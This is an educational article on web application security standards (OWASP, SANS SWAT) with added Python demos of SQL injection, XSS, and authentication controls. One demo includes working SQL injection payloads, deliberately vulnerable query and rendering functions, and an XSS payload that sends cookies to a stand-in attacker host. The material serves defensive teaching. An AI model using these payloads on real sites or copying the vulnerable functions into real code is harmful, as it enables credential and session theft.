By: Gabriel Schram
April 15, 2021
Securing Web Applications: Standards and Vulnerabilities
A web application runs on a server and is accessed by users over a network connection. Users submit requests through a browser or another user interface (UI), and the web application server processes each request and returns a response.
Web applications are widely used today and provide the front end for a vast array of online tools and platforms, from email services and Google applications to online forms, document editors, and web-based databases. Nearly every industrial sector relies on some form of web application in its regular operations. The sheer number of deployed web applications creates a large attack surface, and the sensitive data they often hold makes them a popular target. Because they are exposed directly to the internet, change frequently, and accept untrusted input by design, web applications are often easier to attack than the operating systems and network hardware behind them. Establishing security standards for how web applications are built and operated is therefore essential if their heavy use is to continue. There must first be consensus on which web application attacks are most common and most damaging; from that, standards and best practices can be established that address those vulnerabilities. The OWASP Top 10 and the SANS SWAT checklist serve exactly that purpose.
Establishing standards for web application security is one of the most effective ways to reduce the potential for web application attacks. Simply put, once the major flaws in software development are identified and a "norm" is established, it becomes significantly easier to mitigate those vulnerabilities consistently and therefore to shrink the attack surface.
The Open Web Application Security Project (OWASP) is an open-source community dedicated to securing the web through tools, networking, and education. OWASP has tens of thousands of members and hosts numerous open-source projects and conferences. Everything OWASP publishes is free to anyone interested in improving application security, and its Top 10 list is a widely used reference for the most critical web application risks.
The SANS Securing Web Application Technologies (SWAT) checklist is frequently used as a reference for developers to follow when building and testing web applications. The checklist is valuable because each item describes a specific mitigation and is mapped to the Common Weakness Enumeration (CWE) entries it addresses.
Establishing these types of standards going forward in web application development will further reduce the risk of exploitation. Leaders in this field such as OWASP and SANS continue to make this information openly available with the aim of making web applications more secure.
Web Application Vulnerabilities
Major web application vulnerabilities have led to a wide range of exploits. Among the many flaws found in web applications, some of the most frequently exploited include:
- Broken Authentication/Access Control- Authentication is the process of proving the identity of an application user. Broken authentication lets an attacker compromise passwords, keys, or session tokens, or bypass the login altogether. Broken or improper access control means that authenticated users can reach data or perform actions beyond what they are authorized to do.
- SQL (Structured Query Language) Injection- Client-supplied input is built into a SQL query that the back end sends to the application's database, so the attacker's input is executed as part of the query. A successful SQL injection lets an attacker read, modify, or delete data they should not be able to reach, such as password hashes, financial records, and other sensitive information.
- Cross-Site Scripting (XSS)- Injection of script into a web page served by the application. Because the browser trusts the site that delivered the page, the attacker's script runs in the victim's browser with that site's privileges. This can expose the victim's cookies, session tokens, and other information stored by the browser or application.
- Sensitive Data Exposure/Security Misconfiguration- Sensitive data is left unprotected within an application; this can include financial credentials, health information, and personally identifiable information. Misconfigurations include retained default credentials, sensitive details leaked in error messages, and publicly readable cloud storage, among others. Misconfiguration is extremely common and is a frequent cause of sensitive data exposure.
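As an added example (not code from the original article), the two injection flaws in the list above side by side in Python: a string-built SQL query against a constructed in-memory SQLite table, the same lookup with a bound parameter, and an HTML page that reflects a search term with and without output encoding. The users table, its sample rows, and the payloads are assumptions made for the demonstration.

```python
import html
import sqlite3

# Constructed sample data for an in-memory database (assumed schema; not from
# the original article). Password hashes are placeholders.
SAMPLE_USERS = [
    ("alice", "hash-of-alice-pw", "admin"),
    ("bob", "hash-of-bob-pw", "user"),
]


def make_db():
    """Create an in-memory SQLite database holding the constructed users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password_hash TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    conn.commit()
    return conn


# --- SQL injection -----------------------------------------------------------

def lookup_user_vulnerable(conn, username):
    """String-built query: the client-supplied value becomes part of the SQL
    text, so quotes, OR clauses and UNIONs in it change what the query does."""
    query = f"SELECT username, role FROM users WHERE username = '{username}'"
    return conn.execute(query).fetchall()


def lookup_user_safe(conn, username):
    """Parameterised query: the driver binds the value separately from the
    statement, so the value can never alter the statement's structure."""
    return conn.execute(
        "SELECT username, role FROM users WHERE username = ?", (username,)
    ).fetchall()


# --- Cross-site scripting ----------------------------------------------------

def render_vulnerable(query):
    """Untrusted input concatenated straight into HTML: a <script> element in
    it is parsed as part of the page and runs with the site's own origin."""
    return f"<p>Results for: {query}</p>"


def render_safe(query):
    """Escapes &, <, >, double and single quotes so the input is displayed as
    text rather than parsed as markup. quote=True also makes the result safe
    inside a double-quoted attribute value."""
    return f"<p>Results for: {html.escape(query, quote=True)}</p>"


if __name__ == "__main__":
    db = make_db()
    tautology = "' OR '1'='1"                                   # returns every row
    dump = "' UNION SELECT password_hash, role FROM users --"   # leaks the hashes
    print(lookup_user_vulnerable(db, tautology))
    print(lookup_user_vulnerable(db, dump))
    print(lookup_user_safe(db, tautology))                      # []

    xss = '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>'
    print(render_vulnerable(xss))
    print(render_safe(xss))
```

The common thread is that both fixes keep data and code separate: the database driver binds the parameter after the statement has been parsed, and the HTML encoder turns markup-significant characters into entities before the browser parses the page. Escaping is context-specific; a value placed inside a JavaScript string or a URL needs that context's encoding, not HTML encoding.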
Mitigating Vulnerabilities and Best Practices
Properly securing web applications requires development with security in mind. In other words, software and application developers should build in security measures from the start of a project rather than bolting them on afterwards. The SWAT checklist is a major reference for this phase of securing web applications. It groups its items into seven categories, which makes it one of the more thorough references for building application defenses. These seven categories are:
- Error Handling and Logging
- Data Protection
- Configuration and Operations
- Authentication
- Session Management
- Input and Output Handling
- Access Control
When possible, web applications should use multi-factor authentication (MFA) and enforce long, complex passwords. MFA requires more than one means of proving a user's identity, so a stolen password alone is not enough to log in, and a strong password policy makes guessing and cracking harder. Web applications that lock out an account after a specified number of failed login attempts are also more resistant to brute-force attacks. Moreover, there need to be clearly defined roles for users once they are authenticated: users should only be able to access data and take actions that they are authorized to, and anything not explicitly allowed should be denied. Another basic requirement is input validation, which ensures that only data of the expected type, length, and format enters the application.
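The controls in the paragraph above, implemented together in Python as an added example that is not code from the original article: a password policy, salted PBKDF2 password storage, an RFC 6238 TOTP second factor (implemented here from the standard library, checked against the RFC 4226 test secret), a per-account lockout counter, and a deny-by-default role-to-action map. The threshold values, roles, and in-memory user store are assumptions for the demonstration; a real deployment would persist the counters and secrets server-side.

```python
import hashlib
import hmac
import os
import re
import struct
import time

# Assumed policy values (not from the original article).
MAX_ATTEMPTS = 5            # consecutive failures before the account locks
MIN_PASSWORD_LENGTH = 12
PBKDF2_ROUNDS = 100_000

# Constructed in-memory user store and per-account failure counters.
USERS = {}
FAILED_ATTEMPTS = {}
# Role -> set of permitted actions (assumed roles for the example).
PERMISSIONS = {
    "admin": {"read", "write", "delete_user"},
    "user": {"read", "write"},
}


def password_meets_policy(password):
    """Long and complex: minimum length plus at least three character classes."""
    classes = (r"[a-z]", r"[A-Z]", r"[0-9]", r"[^A-Za-z0-9]")
    hits = sum(1 for c in classes if re.search(c, password))
    return len(password) >= MIN_PASSWORD_LENGTH and hits >= 3


def hash_password(password, salt):
    """Salted, iterated hash; the clear-text password is never stored."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)


def add_user(username, password, role, totp_secret):
    if not password_meets_policy(password):
        raise ValueError("password does not meet policy")
    salt = os.urandom(16)
    USERS[username] = {
        "salt": salt,
        "hash": hash_password(password, salt),
        "role": role,
        "totp_secret": totp_secret,
    }


def hotp(secret, counter, digits=6):
    """RFC 4226 HMAC-based one-time password (HMAC-SHA1, dynamic truncation)."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return code % (10 ** digits)


def totp(secret, now=None, step=30):
    """RFC 6238 time-based code: HOTP over the current 30-second window."""
    now = time.time() if now is None else now
    return hotp(secret, int(now) // step)


def authenticate(username, password, otp, now=None):
    """Return the user's role on success, else None.

    Both factors are required. A locked account fails even with correct
    credentials, so an online guessing attack gains nothing from continuing.
    Comparisons use hmac.compare_digest to avoid timing side channels."""
    if FAILED_ATTEMPTS.get(username, 0) >= MAX_ATTEMPTS:
        return None
    user = USERS.get(username)
    if user is None:
        return None
    password_ok = hmac.compare_digest(
        hash_password(password, user["salt"]), user["hash"]
    )
    otp_ok = hmac.compare_digest(
        str(otp).zfill(6), str(totp(user["totp_secret"], now)).zfill(6)
    )
    if password_ok and otp_ok:
        FAILED_ATTEMPTS[username] = 0        # reset the counter on success
        return user["role"]
    FAILED_ATTEMPTS[username] = FAILED_ATTEMPTS.get(username, 0) + 1
    return None


def authorize(role, action):
    """Deny by default: only actions listed for the role are allowed."""
    return action in PERMISSIONS.get(role, set())


if __name__ == "__main__":
    secret = b"12345678901234567890"          # RFC 4226 test secret
    add_user("alice", "Correct-Horse-9-Battery", "user", secret)
    print(authenticate("alice", "Correct-Horse-9-Battery", totp(secret)))  # user
    print(authorize("user", "delete_user"))                                 # False
```

Note that the lockout counter is keyed per account and only reset by a successful login, so an attacker who guesses against a single account is cut off after MAX_ATTEMPTS regardless of how many sessions they open; the checks that remain in force after authentication are the role lookups in authorize, which refuse any action not explicitly granted.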
To reiterate, many of these defensive measures are relatively simple when implemented from the beginning of web application development. Taking the time to apply application security practices throughout software development is the best way to arrive at a secure web application. Together, the procedures described here reduce the attack surface of web applications. A reduced attack surface and reduced risk make for a more secure app, but it will only stay secure when it is properly maintained and updated. The widespread adoption of web applications has made them popular targets, and the establishment of solid defensive practices is essential, now more than ever.
References
N.A. (2018). Secure coding best practices handbook. Retrieved from https://info.veracode.com/secure-coding-best-practices-hand-book-guide-resource.html
OWASP. (2020). OWASP top ten web application security risks. Retrieved from https://owasp.org/www-project-top-ten/
SANS Institute. (N.A.). Securing web application technologies [SWAT] checklist. Retrieved from https://www.sans.org/cloud-security/securing-web-application-technologies/